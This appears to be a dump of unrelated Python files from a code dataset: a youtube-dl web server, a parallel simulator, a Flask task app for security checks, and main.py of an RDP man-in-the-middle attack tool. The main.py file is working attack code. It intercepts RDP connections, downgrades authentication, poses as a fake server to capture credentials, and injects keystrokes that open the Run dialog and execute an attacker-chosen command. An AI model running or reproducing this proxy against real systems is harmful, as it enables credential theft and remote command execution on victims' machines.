    send_mail(subject='Password Reset', to=user.email, template='emails/reset_password', user=user, token=token)
def send_change_email_email(user, token, to=None):
    """Send the change-of-address confirmation (to the *new* address when given)."""
    send_mail(subject='Change Email Confirm', to=to or user.email, template='emails/change_email', user=user, token=token)
|
youtube-dl-server.py | from __future__ import unicode_literals
import json
import os
import subprocess
from queue import Queue
from bottle import route, run, Bottle, request, static_file
from threading import Thread
import youtube_dl
from pathlib import Path
from collections import ChainMap
# Bottle application plus its default configuration. Each YDL_* default can
# be overridden by an environment variable of the same name, and some also
# per-request (see get_ydl_options' ChainMap).
app = Bottle()

app_defaults = {
    'YDL_FORMAT': 'bestvideo[ext=mp4]+bestaudio[ext=m4a]/best[ext=mp4]',
    'YDL_EXTRACT_AUDIO_FORMAT': None,
    'YDL_EXTRACT_AUDIO_QUALITY': '192',
    'YDL_RECODE_VIDEO_FORMAT': None,
    'YDL_OUTPUT_TEMPLATE': '/youtube-dl/%(title)s [%(id)s].%(ext)s',
    'YDL_ARCHIVE_FILE': None,
    'YDL_SERVER_HOST': '0.0.0.0',
    'YDL_SERVER_PORT': 8080,
}
@app.route('/youtube-dl')
def dl_queue_list():
    """Serve the front-end page."""
    return static_file('index.html', root='./')
@app.route('/youtube-dl/static/:filename#.*#')
def server_static(filename):
    """Serve static assets for the front-end."""
    return static_file(filename, root='./static')
@app.route('/youtube-dl/q', method='GET')
def q_size():
    """Report the pending queue contents.

    NOTE(review): 'size' is actually a JSON *string* of the queued items,
    not an integer count -- confirm the front-end expects this shape.
    """
    return {"success": True, "size": json.dumps(list(dl_q.queue))}
@app.route('/youtube-dl/q', method='POST')
def q_put():
    """Enqueue a download; expects form fields 'url' (required) and 'format'."""
    url = request.forms.get("url")
    if not url:
        return {"success": False, "error": "/q called without a 'url' query param"}
    options = {'format': request.forms.get("format")}
    dl_q.put((url, options))
    print("Added url " + url + " to the download queue")
    return {"success": True, "url": url, "options": options}
def dl_worker():
    # Background thread body: consume (url, options) pairs from the module
    # queue until the global `done` flag is set. Note the flag is only
    # re-checked between items, and dl_q.get() blocks on an empty queue.
    while not done:
        url, options = dl_q.get()
        download(url, options)
        dl_q.task_done()
def get_ydl_options(request_options):
    """Build the youtube-dl options dict for one request.

    Precedence for every YDL_* setting is: per-request value, then the
    YDL_* environment variable, then app_defaults.

    Args:
        request_options: dict with optional 'format' and 'output_path' keys.

    Returns:
        dict suitable for youtube_dl.YoutubeDL(...).
    """
    # Only record keys the request actually overrides. Pre-seeding keys with
    # None (as before) made ChainMap stop at this map and shadow both the
    # environment and app_defaults -- e.g. the YDL_OUTPUT_TEMPLATE default
    # was silently lost.
    request_vars = {}

    requested_output_path = request_options.get('output_path')
    if requested_output_path:
        # Bug fix: this previously assigned into `requested_format`, a name
        # not defined yet (NameError whenever output_path was supplied).
        request_vars['YDL_OUTPUT_TEMPLATE'] = requested_output_path

    requested_format = request_options.get('format', 'bestvideo')

    if requested_format in ['aac', 'flac', 'mp3', 'm4a', 'opus', 'vorbis', 'wav']:
        request_vars['YDL_EXTRACT_AUDIO_FORMAT'] = requested_format
    elif requested_format == 'bestaudio':
        request_vars['YDL_EXTRACT_AUDIO_FORMAT'] = 'best'
    elif requested_format in ['mp4', 'flv', 'webm', 'ogg', 'mkv', 'avi']:
        request_vars['YDL_RECODE_VIDEO_FORMAT'] = requested_format

    ydl_vars = ChainMap(request_vars, os.environ, app_defaults)

    postprocessors = []
    if ydl_vars['YDL_EXTRACT_AUDIO_FORMAT']:
        postprocessors.append({
            'key': 'FFmpegExtractAudio',
            'preferredcodec': ydl_vars['YDL_EXTRACT_AUDIO_FORMAT'],
            'preferredquality': ydl_vars['YDL_EXTRACT_AUDIO_QUALITY'],
        })
    if ydl_vars['YDL_RECODE_VIDEO_FORMAT']:
        postprocessors.append({
            'key': 'FFmpegVideoConvertor',
            # youtube-dl spells this option 'preferedformat' (sic).
            'preferedformat': ydl_vars['YDL_RECODE_VIDEO_FORMAT'],
        })

    return {
        'format': ydl_vars['YDL_FORMAT'],
        'postprocessors': postprocessors,
        'outtmpl': ydl_vars['YDL_OUTPUT_TEMPLATE'],
        'download_archive': ydl_vars['YDL_ARCHIVE_FILE']
    }
def download(url, request_options):
    """Download *url* with youtube-dl, configured from the request options."""
    with youtube_dl.YoutubeDL(get_ydl_options(request_options)) as ydl:
        ydl.download([url])
# --- module entry point: start the worker thread, then serve HTTP ---
dl_q = Queue()
done = False
dl_thread = Thread(target=dl_worker)
dl_thread.start()

print("Started download thread")

app_vars = ChainMap(os.environ, app_defaults)
app.run(host=app_vars['YDL_SERVER_HOST'], port=app_vars['YDL_SERVER_PORT'], debug=True)
# NOTE(review): dl_worker only re-checks `done` between items and dl_q.get()
# blocks on an empty queue, so this join() may hang at shutdown -- confirm.
done = True
dl_thread.join()
|
threaded_simulator.py | from multiprocessing import Process, cpu_count, Value
from simulator import Simulator
import pickle
import os
import shutil
class ThreadedSimulator:
    """Runs several Simulator instances in parallel OS processes.

    Each run writes its result to tmp/run<i>.pkl (presumably done by
    Simulator itself -- confirm); results are unpickled and aggregated
    after all processes have joined.
    """

    def __init__(self, config):
        # Total number of simulation runs; one process is spawned per run,
        # all at once (not batched per core, despite the message below).
        self.runs = config["runs"]
        self.config = config
        print("You have " + str(cpu_count()) + " cores.")
        print("This program will run " + str(self.runs / cpu_count()) + " simulations per core.")

    def start(self):
        """Spawn one process per run, wait for all, and return the collected results."""
        processes = []
        if not os.path.isdir("tmp"):
            os.makedirs("tmp")
        for i in range(self.runs):
            process = Process(target=self.start_simulation, args=(i,))
            process.start()
            processes.append(process)
        for process in processes:
            process.join()
        return self.unpickle_array()

    def start_simulation(self, name):
        # Runs in the child process; *name* is the run index used for the
        # tmp/run<i>.pkl file name.
        sim = Simulator(self.config, name)
        sim.start()

    def unpickle_array(self):
        """Load each run's pickled (contracts, profiles) pair, then delete tmp/."""
        contracts, profiles = [], []
        for i in range(self.runs):
            pathname = os.path.join("tmp", "run" + str(i))
            with open(pathname + '.pkl', 'rb') as f:
                result = pickle.load(f)
            contracts.append(result[0])
            profiles.append(result[1])
        shutil.rmtree("tmp")
        return contracts, profiles
if __name__ == "__main__":
    import time
    from backend.optimizer import Algorithm

    start_time = time.time()

    # Hardcoded example configuration for a quick timed benchmark run.
    config = {
        "neighbourhood": "test",
        "timefactor": 0.0000000000001,
        "length": 86400,
        "algo": Algorithm.SLSQP.value,
        "runs": 16
    }
    sim = ThreadedSimulator(config)
    results = sim.start()
    # results == (contracts, profiles); one entry per run.
    print(len(results[0]))
    print(len(results[1]))
    end_time = time.time()
    elapsed_time = end_time - start_time
    print("Elapsed time: " + str(elapsed_time))
|
main.py | import socket
import ssl
import threading
import select
import re
import os
import subprocess
import time
from binascii import hexlify, unhexlify
from base64 import b64encode
from seth.args import args
from seth.parsing import *
import seth.consts as consts
class RDPProxy(threading.Thread):
    """Represents the RDP Proxy.

    Sits between an RDP client (lsock) and the real server (rsock),
    forwarding traffic while downgrading and inspecting it. In fake-server
    mode (args.fake_server) there is no rsock: the proxy itself answers the
    client until credentials are captured.
    """

    def __init__(self, local_conn, remote_socket):
        super(RDPProxy, self).__init__()
        self.cancelled = False
        self.lsock = local_conn      # socket to the victim client
        self.rsock = remote_socket   # socket to the real server (None in fake-server mode)
        self.vars = {}               # values parsed from the exchange (creds, protocol, ...)
        self.injection_key_count = -100
        self.keyinjection_started = False
        # RC4-SHA is needed to talk to some servers (e.g. older Windows);
        # probe whether the local openssl build still offers it.
        if b"RC4-SHA" in subprocess.check_output('openssl ciphers'.split()):
            self.rc4 = True
        else:
            print("Warning: RC4 not available on client, attack might not work")
            self.rc4 = False
        # self.relay_proxy = None
        # if args.relay:  # TODO
        #     threading.Thread(target=launch_rdp_client).start()
        #     relay_lsock, relay_rsock = open_sockets(consts.RELAY_PORT)
        #     self.relay_proxy = RDPProxyNTLMRelay(relay_lsock, relay_rsock)
        #     self.relay_proxy.start()

    def run(self):
        """Thread entry point: negotiate, optionally wrap in TLS, then relay."""
        self.handle_protocol_negotiation()
        if not (self.cancelled or self.vars["RDP_PROTOCOL"] == 0):
            self.enableSSL()
        if args.fake_server:
            try:
                self.run_fake_server()
            except ConnectionResetError:
                print("Connection lost")
        while not self.cancelled and not args.fake_server:
            try:
                self.forward_data()
            except (ssl.SSLError, ssl.SSLEOFError) as e:
                print("SSLError: %s" % str(e))
            except (ConnectionResetError, OSError, ValueError) as e:
                print("Connection lost (%s)" % str(e))
            if "creds" in self.vars:
                stop_attack()

    def run_fake_server(self):
        """Impersonate an RDP server just long enough to harvest credentials."""
        bufsize = 4096
        # hide forged protocol
        data = self.lsock.recv(bufsize)
        dump_data(data, From="Client")
        resp = consts.SERVER_RESPONSES[1]
        regex = b".*%s..010c" % hexlify(b"McDn")
        m = re.match(regex, hexlify(resp))
        resp = set_fake_requested_protocol(resp, m,
                                           self.vars["RDP_PROTOCOL"])
        self.lsock.send(resp)
        # start with channel join requests
        data = self.lsock.recv(bufsize)
        dump_data(data, From="Client")
        data = self.lsock.recv(bufsize)
        dump_data(data, From="Client")
        self.lsock.send(consts.SERVER_RESPONSES[2])
        # confirm all requests (reverse engineered; couldn't find
        # documentation on this)
        while True:
            data = self.lsock.recv(bufsize)
            dump_data(data, From="Client")
            self.save_vars(parse_rdp(data, self.vars, From="Client"))
            if "creds" in self.vars:
                self.lsock.send(consts.SERVER_RESPONSES[3])
                break
            # Last byte of the request is the channel id to acknowledge
            # (renamed from `id`, which shadowed the builtin).
            if data:
                channel_id = data[-1]
            else:
                channel_id = 0
            self.lsock.send(unhexlify(b"0300000f02f0803e00000803%02x03%02x" %
                                      (channel_id, channel_id)))
        self.close()
        stop_attack()

    def cancel(self):
        """Close both sockets and mark this proxy as finished."""
        self.close()
        self.cancelled = True

    def handle_protocol_negotiation(self):
        """Relay the X.224 connection request, downgrading the security protocol."""
        data = self.lsock.recv(4096)
        if not data:
            print('No data returned')
            self.cancelled = True
            return None
        dump_data(data, From="Client")
        self.save_vars({"RDP_PROTOCOL_OLD": data[-4]})
        data = downgrade_auth(data)
        self.save_vars({"RDP_PROTOCOL": data[-4]})

        if args.fake_server:
            self.lsock.send(consts.SERVER_RESPONSES[0])
            return None

        self.rsock.send(data)
        data = self.rsock.recv(4096)
        dump_data(data, From="Server")
        # This pattern marks a server that insists on NLA.
        regex = b"0300.*000300080005000000$"
        m = re.match(regex, hexlify(data))
        if m:
            if not args.fake_server:
                print("Server enforces NLA; switching to 'fake server' mode")
                args.fake_server = True
            data = consts.SERVER_RESPONSES[0]
        self.lsock.send(data)

    def enableSSL(self):
        """Wrap both sockets in TLS (server-side toward the client)."""
        print("Enable SSL")
        try:
            sslversion = get_ssl_version(self.lsock)
            self.lsock = ssl.wrap_socket(
                self.lsock,
                server_side=True,
                keyfile=args.keyfile,
                certfile=args.certfile,
                ssl_version=sslversion,
            )
            if self.rc4:
                try:
                    self.rsock = ssl.wrap_socket(self.rsock, ciphers="RC4-SHA")
                except ssl.SSLError as e:
                    # Bug fix: `e` was referenced here without being bound
                    # (the except clause lacked `as e`), raising NameError.
                    print("Not using RC4-SHA because of SSL Error:", str(e))
                    self.rsock = ssl.wrap_socket(self.rsock, ciphers=None)
            else:
                self.rsock = ssl.wrap_socket(self.rsock, ciphers=None)
        except ConnectionResetError:
            print("Connection lost")
        except ssl.SSLEOFError:
            print("SSL EOF Error during handshake")
        except AttributeError as e:
            # happens when there is no rsock, i.e. fake_server==True
            print(e)
            pass

    def close(self):
        """Close the client socket, and the server socket unless in fake-server mode."""
        self.lsock.close()
        if not args.fake_server:
            self.rsock.close()
        else:
            pass

    def forward_data(self):
        """Shuttle one round of data between client and server, parsing/tampering it.

        Returns True while the connection is alive, False once it has ended.
        """
        readable, _, _ = select.select([self.lsock, self.rsock], [], [])
        for s_in in readable:
            if s_in == self.lsock:
                From = "Client"
                s_out = self.rsock
            elif s_in == self.rsock:
                From = "Server"
                s_out = self.lsock
            try:
                data = read_data(s_in)
            except ssl.SSLError as e:
                self.handle_ssl_error(e)
                data = b""
            if not data:
                self.cancel()
                return False
            dump_data(data, From=From)
            self.save_vars(parse_rdp(data, self.vars, From=From))
            data = tamper_data(data, self.vars, From=From)
            s_out.send(data)
            if From == "Client" and "creds" in self.vars and args.inject:
                self.send_keyinjection(s_out)
        return True

    def save_vars(self, vars):
        # First writer wins: existing keys are never overwritten.
        for k, v in vars.items():
            if k not in self.vars:
                self.vars[k] = v
                print_var(k, self.vars)

    def handle_ssl_error(self, e):
        """React to known TLS alerts; re-raise anything unexpected."""
        if "alert access denied" in str(e):
            print("TLS alert access denied, Downgrading CredSSP")
            self.lsock.send(unhexlify(b"300da003020104a4060204c000005e"))
        elif "alert internal error" in str(e):
            # openssl connecting to windows7 with AES doesn't seem to
            # work, thus try RC4 first
            print("TLS alert internal error received, make sure to use RC4-SHA")
        else:
            raise

    def send_keyinjection(self, s_out):
        """Inject the configured command as fast-path keystrokes.

        injection_key_count starts at -100, so injection fires only after
        100 client packets have passed (lets the session settle first).
        """
        attack = convert_str_to_scancodes(args.inject)
        if self.injection_key_count == 0:
            print('Injecting command...')
            for key in attack:
                # use fastpath
                data = unhexlify(b"4404%02x%02x" % (key[1], key[0]))
                dump_data(data, From="Client", Modified=True)
                s_out.send(data)
                time.sleep(key[2])
            print("Pwnd")
        self.injection_key_count += 1
def read_data(sock):
    """Read one application message from *sock*.

    Messages can exceed one recv() buffer; as a heuristic, keep reading
    while the amount received so far is an exact multiple of 4096 bytes.

    Bug fix: if the peer closed mid-message, recv() returned b"" and the
    length stayed a multiple of 4096, so the original looped forever.
    Now an empty recv() terminates the read.
    """
    data = sock.recv(4096)
    while data and len(data) % 4096 == 0:
        chunk = sock.recv(4096)
        if not chunk:  # EOF: peer closed the connection
            break
        data += chunk
    return data
def open_sockets(port):
    """Accept one client connection; optionally also connect to the real target.

    Returns (local_conn, remote_socket); remote_socket is None in
    fake-server mode.
    """
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    listener.bind((args.bind_ip, args.listen_port))
    listener.listen()
    print("Listening for new connection")
    local_conn, addr = listener.accept()
    print("Connection received from %s:%d" % addr)

    if args.fake_server:
        return local_conn, None

    remote_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    remote_socket.connect((args.target_host, port))
    return local_conn, remote_socket
def get_ssl_version(sock):
    """Peek at the TLS ClientHello and map its version byte to a PROTOCOL_* constant.

    Seth behaves differently depending on the TLS protocol
    (https://bugs.python.org/issue31453). This is an ugly hack (as if the
    rest of this wasn't...): the version byte is read with MSG_PEEK so it
    stays in the socket buffer for the real handshake.
    """
    versions = [
        ssl.PROTOCOL_TLSv1,
        ssl.PROTOCOL_TLSv1_1,
        ssl.PROTOCOL_TLSv1_2,
    ]
    header = sock.recv(16, socket.MSG_PEEK)
    try:
        # Byte 10 holds the minor protocol version (1..3).
        return versions[header[10] - 1]
    except IndexError:
        print("Unexpected SSL version: %s" % hexlify(header))
        return versions[-1]
# def launch_rdp_client():
# time.sleep(1)
# p = subprocess.Popen(
# ["xfreerdp",
# "/v:%s:%d" % (args.bind_ip, consts.RELAY_PORT),
# "/u:%s\\%s" % (domain, user),
# ],
# )
def stop_attack():
    # Hard-exit the whole process (all proxy threads) immediately;
    # os._exit skips atexit handlers and finally blocks.
    os._exit(0)
def convert_str_to_scancodes(string):
    """Convert *string* into a list of [scancode, flags, delay] key events.

    The resulting sequence opens the Windows run dialog (Win+R), types the
    string (holding Shift for uppercase letters and shifted specials), and
    presses Enter. flags: 0 = key down, 1 = key up, +2 = extended modifier.
    """
    # Fix: the old literal "ABCDEFGHJIJKLMNOPQRSTUVWXYZ" duplicated 'J' and
    # put it before 'I'; membership testing was unaffected, but spell the
    # alphabet correctly.
    uppercase_letters = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
    # Actually, the following depends on the keyboard layout
    # NOTE(review): ':' maps to '.' here; on a US layout ':' is Shift+';' --
    # confirm which layout this table targets.
    special_chars = {
        ":": ".",
        "{": "[",
        "}": "]",
        "!": "1",
        "@": "2",
        "#": "3",
        "$": "4",
        "%": "5",
        "^": "6",
        "&": "7",
        "*": "8",
        "(": "9",
        ")": "0",
        "<": ",",
        ">": ".",
        "\"": "'",
        "|": "\\",
        "?": "/",
        "_": "-",
        "+": "=",
    }
    UP = 1
    DOWN = 0
    MOD = 2
    # For some reason, the meta (win) key needs an additional modifier (+2)
    result = [[consts.REV_SCANCODE["LMeta"], DOWN + MOD, .2],
              [consts.REV_SCANCODE["R"], DOWN, 0],
              [consts.REV_SCANCODE["R"], UP, 0.2],
              [consts.REV_SCANCODE["LMeta"], UP + MOD, .1],
              ]
    for c in string:
        if c in uppercase_letters:
            # Shift + letter for uppercase.
            result.append([consts.REV_SCANCODE["LShift"], DOWN, 0.02])
            result.append([consts.REV_SCANCODE[c], DOWN, 0])
            result.append([consts.REV_SCANCODE[c], UP, 0])
            result.append([consts.REV_SCANCODE["LShift"], UP, 0])
        elif c in special_chars:
            # Shift + the unshifted key that produces this character.
            c = special_chars[c]
            result.append([consts.REV_SCANCODE["LShift"], DOWN, 0.02])
            result.append([consts.REV_SCANCODE[c], DOWN, 0])
            result.append([consts.REV_SCANCODE[c], UP, 0])
            result.append([consts.REV_SCANCODE["LShift"], UP, 0])
        else:
            # Scancode table is keyed by uppercase names.
            c = c.upper()
            result.append([consts.REV_SCANCODE[c], DOWN, 0])
            result.append([consts.REV_SCANCODE[c], UP, 0])
    result += [[consts.REV_SCANCODE["Enter"], DOWN, 0],
               [consts.REV_SCANCODE["Enter"], UP, 0],
               ]
    return result
def run():
    """Main loop: accept one client at a time, handing each to a new RDPProxy thread."""
    try:
        while True:
            lsock, rsock = open_sockets(args.target_port)
            RDPProxy(lsock, rsock).start()
    except KeyboardInterrupt:
        pass
|
view.py | #!/usr/bin/python3
# -*- coding:utf-8 -*-
import math
import os
import random
import string
import threading
import time
from flask import url_for, render_template, request, flash, send_from_directory
from flask_login import login_required, current_user
from werkzeug.utils import redirect
from . import main
from app import utils
from models.Lin_exec_check import lin_execcheck, lin_only_check
from models.win_exec_check import win_execcheck, win_only_check
from app.main.forms import LinuxForm, WindowsForm, ResetpwdForm, UploadForm
from app.dbset import Tasklist, User
from app.utils import file_to_zip, zip_to_file
def online(checkdef, form, view):
    """Handle an 'online check' form: validate, record a task, run *checkdef* in a thread."""
    if request.method == 'POST':
        if not form.validate_on_submit():
            utils.flash_errors(form)
        else:
            ip = form.formip.raw_data[0]
            port = form.formport.raw_data[0]
            user = form.formuser.raw_data[0]
            passwd = form.formpwd.raw_data[0]
            note = form.formnote.raw_data[0]
            # 10-digit task id (a shuffle of the digits 0-9).
            theorder = ''.join(random.sample(string.digits, 10))
            cr = Tasklist.create(
                theorder=theorder,
                time=str(time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())),
                status='0', note=note)
            worker = threading.Thread(target=checkdef,
                                      args=(ip, port, user, passwd, theorder,))
            worker.start()
            flash('任务提交成功,任务编号:' + theorder)
    return render_template(view, form=form)
def offline(checkdef, systemtype, form, view):
    """Handle an 'offline check' upload: save the zip, extract it, run *checkdef* in a thread."""
    if request.method == 'POST':
        # 10-digit task id (a shuffle of the digits 0-9).
        theorder = ''.join(random.sample(string.digits, 10))
        note = form.formnote.raw_data[0]
        zipfile = request.files.get('formfile')
        zip_src = os.getcwd() + '/models/temp/' + theorder + '.zip'
        zipfile.save(zip_src)
        Rawipdir = zip_to_file(theorder, zip_src, systemtype)
        if Rawipdir == 'notzip':
            flash('zip压缩包格式错误或有损')
            return render_template(view, form=form)
        cr = Tasklist.create(
            theorder=theorder,
            time=str(time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())),
            status='0',
            note=note)
        worker = threading.Thread(target=checkdef, args=(Rawipdir, theorder,))
        worker.start()
        flash('任务提交成功,任务编号:' + theorder)
    return render_template(view, form=form)
def check_result(view):
    """Render the paginated task list; also services 'delete' and 'down' actions.

    Query params: action ('delete' or 'down'), id (task number),
    page (default 1), length (page size, default 10).
    """
    action = request.args.get('action')
    theorder = request.args.get('id')
    if action == 'delete':
        Tasklist.delete().where(Tasklist.theorder == theorder).execute()
    if action == 'down':
        # Zip the task's result files and stream the archive to the browser.
        (zipdir, zipbao) = file_to_zip(theorder)
        return send_from_directory(zipdir, zipbao, as_attachment=True)
    page = int(request.args.get('page')) if request.args.get('page') else 1
    length = int(request.args.get('length')) if request.args.get('length') else 10
    query = Tasklist.select().order_by(Tasklist.time.desc())
    total_count = query.count()
    if page:
        query = query.paginate(page, length)
    # Renamed from `dict`, which shadowed the builtin.
    page_data = {'content': utils.query_to_list(query), 'total_count': total_count,
                 'total_page': math.ceil(total_count / length), 'page': page,
                 'length': length}
    return render_template(view, form=page_data)
def reset_passwd(form, view):
    """Handle the admin password-change form."""
    if request.method == 'POST':
        if not form.validate_on_submit():
            utils.flash_errors(form)
        else:
            old_password = form.oldpwd.raw_data[0]
            new_password = form.newpwd.raw_data[0]
            account = User.get(User.username == current_user.username)
            # Require the current password before applying the new one.
            if account.verify_password(old_password):
                account.update_password(current_user.username, new_password)
                flash('管理员密码修改成功')
            else:
                flash('管理员原密码错误')
    return render_template(view, form=form)
@main.route('/', methods=['GET'])
@login_required
def root():
    """Redirect the bare root URL to the dashboard."""
    return redirect(url_for('main.index'))


@main.route('/index', methods=['GET'])
@login_required
def index():
    """Dashboard: total task count and count of tasks still running (status '0')."""
    num1 = Tasklist.select().count()
    num2 = Tasklist.select().where(Tasklist.status == '0').count()
    return render_template('index.html', num1=num1, num2=num2, current_user=current_user)
@main.route('/onlinelinux', methods=['GET', 'POST'])
@login_required
def onlinelinux():
    """Online (SSH-based) Linux check."""
    checkdef = lin_execcheck
    return online(checkdef, LinuxForm(), 'onlinelinux.html')


@main.route('/onlinewindows', methods=['GET', 'POST'])
@login_required
def onlinewindows():
    """Online Windows check."""
    checkdef = win_execcheck
    return online(checkdef, WindowsForm(), 'onlinewindows.html')


@main.route('/offlinelinux', methods=['GET', 'POST'])
@login_required
def offlinelinux():
    """Offline Linux check from an uploaded zip of collected output."""
    checkdef = lin_only_check
    systemtype = 'Linux'
    return offline(checkdef, systemtype, UploadForm(), 'offlinelinux.html')


@main.route('/offlinewindows', methods=['GET', 'POST'])
@login_required
def offlinewindows():
    """Offline Windows check from an uploaded zip of collected output."""
    checkdef = win_only_check
    systemtype = 'Windows'
    return offline(checkdef, systemtype, UploadForm(), 'offlinewindows.html')
@main.route('/result', methods=['GET', 'POST'])
@login_required
def result():
    """Task list / result download page."""
    return check_result('result.html')


@main.route('/resetpwd', methods=['GET', 'POST'])
@login_required
def resetpwd():
    """Admin password change page."""
    return reset_passwd(ResetpwdForm(), 'resetpwd.html')
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.